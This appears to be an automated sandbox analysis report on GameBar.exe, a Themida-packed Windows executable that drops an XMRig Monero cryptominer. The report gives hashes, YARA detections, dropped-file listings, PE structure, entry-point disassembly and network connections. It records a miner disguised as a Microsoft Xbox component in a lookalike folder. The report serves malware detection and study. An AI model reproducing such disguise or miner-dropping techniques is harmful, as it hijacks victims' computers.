Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe

Download File

Process:	C:\Users\user\Desktop\GameBar.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	6132520
Entropy (8bit):	7.952707219352515
Encrypted:	false
SSDEEP:	98304:YitH/DgztHyDo06UOGfgD5vbZ1gMiPMcTgW9VPYMRIgZa1GLREp:YWfD4hyDTTEl9Y7ZaYtc
MD5:	8EFB0A8FD404D31541B7592CAE776E58
SHA1:	1BE6C32C0A13A1F76B9EEED08B46192CEB197D29
SHA-256:	6BD3020ED8E6BB3DF3F419ECDBA60FDF30A66D5EA43252329962BF29201131A0
SHA-512:	A068E2B0824CAF2032443F9717126AFF6296585615F19B06E9C44C37554C422E30C50AD311717DCA181EA0657739368845FC10CD6F412E38B11B1C2CDF14C3F6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 51%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....pad...............&......Y..&..`!.........@.............................0........^...`... .............................................B.Y.d.....Y.8...4........b]..1... ..............................(.Y.(................................................... P...........................`..` ..V......f<.................@... .=....X.......=.............@..@ ......X......F=.............@..@ 0.....Y......R=.............@..@.bss.....$... Y......V=................. 4....PY......V=.............@... `....`Y......X=.............@... .....pY......Z=.............@....rsrc...8.....Y......\=.............@... 8.....Y......d=.............@..B.idata........Y......h=.............@....tls..........Y......j=..................themida.`;...Y......l=.............`....boot........ .......l=.............`..`.reloc..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	45177
Entropy (8bit):	5.072498410577891
Encrypted:	false
SSDEEP:	768:PkWNxV3IpNBQkj25h4iUxuaV7frRJv5FVvCxHBG75ard35n9QOdBQNWzktAHkaN2:PkAxV3CNBQkj25h4iUxuaV7flJnVv6HA
MD5:	79EA83B42F934BED47A1B30D85AB0999
SHA1:	D5AD1B90152F5C698A714FC8044C52571EFCD57B
SHA-256:	9DDA715941C069B34C2052F8902BD6FE9C4956DD2F9E8713F8AD72032BD9662B
SHA-512:	6BDD1F73F199EE5A8BC2EB6FF1B13197E1303B2548932F071EA67A657B5D0056605C5FFC3BAEC02AFDF29A5425BCFA003BA607041A462C2A851B59AF0999567C
Malicious:	false
Reputation:	unknown
Preview:	PSMODULECACHE.F..._.>....?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PKI\PKI.psd1........Export-Certificate........Get-CertificateNotificationTask........Get-PfxData........New-CertificateNotificationTask........Import-PfxCertificate....#...Set-CertificateAutoEnrollmentPolicy........Export-PfxCertificate........Switch-Certificate........New-SelfSignedCertificate....%...Get-CertificateEnrollmentPolicyServer....%...Add-CertificateEnrollmentPolicyServer....(...Remove-CertificateEnrollmentPolicyServer........Import-Certificate........Test-Certificate........Get-Certificate...."...Remove-CertificateNotificationTask....#...Get-CertificateAutoEnrollmentPolicy........_t.....q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...R

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	unknown
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_if3i441h.ju3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j2je4om5.lpq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jotfq41m.3pt.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mv5f5r0q.jrq.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	45177
Entropy (8bit):	5.072498410577891
Encrypted:	false
SSDEEP:	768:PkWNxV3IpNBQkj25h4iUxuaV7frRJv5FVvCxHBG75ard35n9QOdBQNWzktAHkaN2:PkAxV3CNBQkj25h4iUxuaV7flJnVv6HA
MD5:	79EA83B42F934BED47A1B30D85AB0999
SHA1:	D5AD1B90152F5C698A714FC8044C52571EFCD57B
SHA-256:	9DDA715941C069B34C2052F8902BD6FE9C4956DD2F9E8713F8AD72032BD9662B
SHA-512:	6BDD1F73F199EE5A8BC2EB6FF1B13197E1303B2548932F071EA67A657B5D0056605C5FFC3BAEC02AFDF29A5425BCFA003BA607041A462C2A851B59AF0999567C
Malicious:	false
Reputation:	unknown
Preview:	PSMODULECACHE.F..._.>....?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PKI\PKI.psd1........Export-Certificate........Get-CertificateNotificationTask........Get-PfxData........New-CertificateNotificationTask........Import-PfxCertificate....#...Set-CertificateAutoEnrollmentPolicy........Export-PfxCertificate........Switch-Certificate........New-SelfSignedCertificate....%...Get-CertificateEnrollmentPolicyServer....%...Add-CertificateEnrollmentPolicyServer....(...Remove-CertificateEnrollmentPolicyServer........Import-Certificate........Test-Certificate........Get-Certificate...."...Remove-CertificateNotificationTask....#...Get-CertificateAutoEnrollmentPolicy........_t.....q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...R

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	unknown
Preview:	@...e...........................................................

C:\Windows\Temp\__PSScriptPolicyTest_0bqbcp3h.4qd.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Windows\Temp\__PSScriptPolicyTest_30cfw2x1.zlb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Windows\Temp\__PSScriptPolicyTest_4h3aqghf.dau.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Windows\Temp\__PSScriptPolicyTest_l5do0yx4.gz3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Windows\Temp\__PSScriptPolicyTest_lcghhg5d.vol.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Windows\Temp\__PSScriptPolicyTest_xuws2wfj.1jc.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Windows\Temp\__PSScriptPolicyTest_ygdj1nqn.cx1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Windows\Temp\__PSScriptPolicyTest_yhmx5uyz.c1c.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Windows\Temp\drwozmpbokky.tmp

Download File

Process:	C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5536256
Entropy (8bit):	6.689058470432344
Encrypted:	false
SSDEEP:	98304:VJuCqT8q5Jt3eM2UIDLeIY3I7LMHrPZF6OhgIDxDjP5ysRAwRCVYFufw6:zulp5JtBF6Oh3DxxysRFkRw6
MD5:	8FA2F1BA9B9A7EA2B3C4DD627C627CEC
SHA1:	358E3800286E5D4C5662366AD7311BC5A51BA497
SHA-256:	78A452A6E1A3951DC367F57ACE90711202C824B68835C5DB86814F5B41486947
SHA-512:	74EDD438B806E086A3FACBE8FB98E235068C0D3F8572C6A3A937649CA0E9A6BCB9F0B42E5562E1CBE3576B011AB83730FC622B1496CC448DD3C296284671E775
Malicious:	true
Yara Hits:	Rule: XMRIG_Monero_Miner, Description: Detects Monero mining software, Source: C:\Windows\Temp\drwozmpbokky.tmp, Author: Florian Roth (Nextron Systems) Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\Temp\drwozmpbokky.tmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Temp\drwozmpbokky.tmp, Author: Joe Security Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Windows\Temp\drwozmpbokky.tmp, Author: ditekSHen Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Windows\Temp\drwozmpbokky.tmp, Author: unknown
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 44%
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$................................................................i..............C..Q....i.....i.....i........}....i.....Rich...........PE..d.....(d..........".......9...D.......6........@..............................~...........`.................................................\|.P......P~.......{..............`~......AM......................BM.(... AM.8.............9..............................text...^.9.......9................. ..`.rdata........9.......9.............@..@.data.....+...P.......P.............@....pdata........{.......Q.............@..@_RANDOMXV.....}.......S.............@..`_TEXT_CN.&....}..(....S.............@..`_TEXT_CN..... ~.......S.............@..`_RDATA.......@~.......S.............@..@.rsrc........P~.......S.............@..@.reloc.......`~.......S.............@..B........................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.952707219352515
TrID:	Win64 Executable (generic) (12005/4) 74.80% Generic Win/DOS Executable (2004/3) 12.49% DOS Executable Generic (2002/1) 12.47% VXD Driver (31/22) 0.19% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name:	GameBar.exe
File size:	6132520
MD5:	8efb0a8fd404d31541b7592cae776e58
SHA1:	1be6c32c0a13a1f76b9eeed08b46192ceb197d29
SHA256:	6bd3020ed8e6bb3df3f419ecdba60fdf30a66d5ea43252329962bf29201131a0
SHA512:	a068e2b0824caf2032443f9717126aff6296585615f19b06e9c44c37554c422e30c50ad311717dca181ea0657739368845fc10cd6f412e38b11b1c2cdf14c3f6
SSDEEP:	98304:YitH/DgztHyDo06UOGfgD5vbZ1gMiPMcTgW9VPYMRIgZa1GLREp:YWfD4hyDTTEl9Y7ZaYtc
TLSH:	E756330CE23CA54CD452653A5B1A17339B621A711B3E8EC5BA8D03FB3D0C3596FDB49A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....pad...............&......Y..&..`!.........@.............................0........^...`... ............................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x140952160
Entrypoint Section:	.boot
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE
Time Stamp:	0x646170BE [Sun May 14 23:37:34 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	35a81d16af9f2ba6d515f11152d0364b

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Adler SignKey CA, L=Luhansk, O=Adler Soft Development
Signature Validation Error:	A certificate chain could not be built to a trusted root authority
Error Number:	-2146762486
Not Before, Not After	5/15/2023 5:00:00 PM 5/15/2025 5:00:00 PM
Subject Chain	CN=GameBar, O=GameBar, L=GameBar, C=NO
Version:	3
Thumbprint MD5:	E533B44CD3F75A62EA120337DEFB9ED7
Thumbprint SHA-1:	392ED46807D01A72BD37BA85B53AE9B42D96395A
Thumbprint SHA-256:	A7F7EC1DCEA4273E2C543A7D970B888F2342E2BC7F05618F0C9FB3819323453E
Serial:	698DA181A6FE4460

Entrypoint Preview

Instruction
call 00007F00C4C4F5A7h
inc ecx
push edx
dec ecx
mov edx, esp
inc ecx
push edx
dec ecx
mov esi, dword ptr [edx+10h]
dec ecx
mov edi, dword ptr [edx+20h]
cld
mov dl, 80h
mov al, byte ptr [esi]
dec eax
inc esi
mov byte ptr [edi], al
dec eax
inc edi
mov ebx, 00000002h
add dl, dl
jne 00007F00C4C4F429h
mov dl, byte ptr [esi]
dec eax
inc esi
adc dl, dl
jnc 00007F00C4C4F406h
add dl, dl
jne 00007F00C4C4F429h
mov dl, byte ptr [esi]
dec eax
inc esi
adc dl, dl
jnc 00007F00C4C4F480h
xor eax, eax
add dl, dl
jne 00007F00C4C4F429h
mov dl, byte ptr [esi]
dec eax
inc esi
adc dl, dl
jnc 00007F00C4C4F528h
add dl, dl
jne 00007F00C4C4F429h
mov dl, byte ptr [esi]
dec eax
inc esi
adc dl, dl
adc eax, eax
add dl, dl
jne 00007F00C4C4F429h
mov dl, byte ptr [esi]
dec eax
inc esi
adc dl, dl
adc eax, eax
add dl, dl
jne 00007F00C4C4F429h
mov dl, byte ptr [esi]
dec eax
inc esi
adc dl, dl
adc eax, eax
add dl, dl
jne 00007F00C4C4F429h
mov dl, byte ptr [esi]
dec eax
inc esi
adc dl, dl
adc eax, eax
je 00007F00C4C4F42Bh
push edi
mov eax, eax
dec eax
sub edi, eax
mov al, byte ptr [edi]
pop edi
mov byte ptr [edi], al
dec eax
inc edi
mov ebx, 00000002h
jmp 00007F00C4C4F3AAh
mov eax, 00000001h
add dl, dl
jne 00007F00C4C4F429h
mov dl, byte ptr [esi]
dec eax
inc esi
adc dl, dl
adc eax, eax
add dl, dl
jne 00007F00C4C4F429h
mov dl, byte ptr [esi]
dec eax
inc esi
adc dl, dl
jc 00007F00C4C4F408h
sub eax, ebx
mov ebx, 00000001h
jne 00007F00C4C4F450h
mov ecx, 00000001h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x59a042	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x598000	0x638	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x941334	0x1218	.themida
IMAGE_DIRECTORY_ENTRY_SECURITY	0x5d6210	0x3118	.themida
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb52000	0x10	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x59b028	0x28	.tls
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x1ac50	0xc200	False	0.9963957796391752	data	7.970397766050055	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
	0x1c000	0x56e0c0	0x3c6600	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x58b000	0x3db0	0x1800	False	0.9781901041666666	data	7.852408585785065	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
	0x58f000	0x120c	0xc00	False	0.9072265625	data	7.361409367164832	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
	0x591000	0xf30	0x400	False	1.0107421875	data	7.716389477475644	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x592000	0x24c0	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x595000	0xa34	0x200	False	0.876953125	data	6.272045098112867	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x596000	0x60	0x200	False	0.7109375	data	6.083541408769693	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x597000	0x10	0x200	False	0.7265625	data	5.594662921962412	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x598000	0x638	0x800	False	0.36669921875	data	4.044087027783914	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x599000	0x338	0x400	False	0.8359375	data	6.604755573182746	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.idata	0x59a000	0x1000	0x200	False	0.1796875	data	1.2818628210629965	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x59b000	0x1000	0x200	False	0.052734375	data	0.32010974348767507	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.themida	0x59c000	0x3b6000	0x0	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.boot	0x952000	0x1ff600	0x1ff600	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc	0xb52000	0x1000	0x10	False	1.5	GLS_BINARY_LSB_FIRST	2.7743974703476995	IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x5980a0	0x268	MS Windows COFF Motorola 68000 object file	English	United States
RT_MANIFEST	0x598308	0x330	XML 1.0 document, ASCII text	English	United States

Imports

DLL	Import
kernel32.dll	GetModuleHandleA
msvcrt.dll	__C_specific_handler

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 23, 2023 02:11:27.581604004 CEST	49700	443	192.168.2.3	141.94.96.144
May 23, 2023 02:11:27.581671953 CEST	443	49700	141.94.96.144	192.168.2.3
May 23, 2023 02:11:27.581780910 CEST	49700	443	192.168.2.3	141.94.96.144
May 23, 2023 02:11:27.582442999 CEST	49700	443	192.168.2.3	141.94.96.144
May 23, 2023 02:11:27.582467079 CEST	443	49700	141.94.96.144	192.168.2.3
May 23, 2023 02:11:27.652450085 CEST	443	49700	141.94.96.144	192.168.2.3
May 23, 2023 02:11:27.673985958 CEST	49700	443	192.168.2.3	141.94.96.144
May 23, 2023 02:11:27.674031019 CEST	443	49700	141.94.96.144	192.168.2.3
May 23, 2023 02:11:27.676101923 CEST	443	49700	141.94.96.144	192.168.2.3
May 23, 2023 02:11:27.678487062 CEST	49700	443	192.168.2.3	141.94.96.144
May 23, 2023 02:11:27.682069063 CEST	49700	443	192.168.2.3	141.94.96.144
May 23, 2023 02:11:27.682276011 CEST	443	49700	141.94.96.144	192.168.2.3
May 23, 2023 02:11:27.755484104 CEST	49700	443	192.168.2.3	141.94.96.144
May 23, 2023 02:11:27.755517960 CEST	443	49700	141.94.96.144	192.168.2.3
May 23, 2023 02:11:27.856528044 CEST	49700	443	192.168.2.3	141.94.96.144
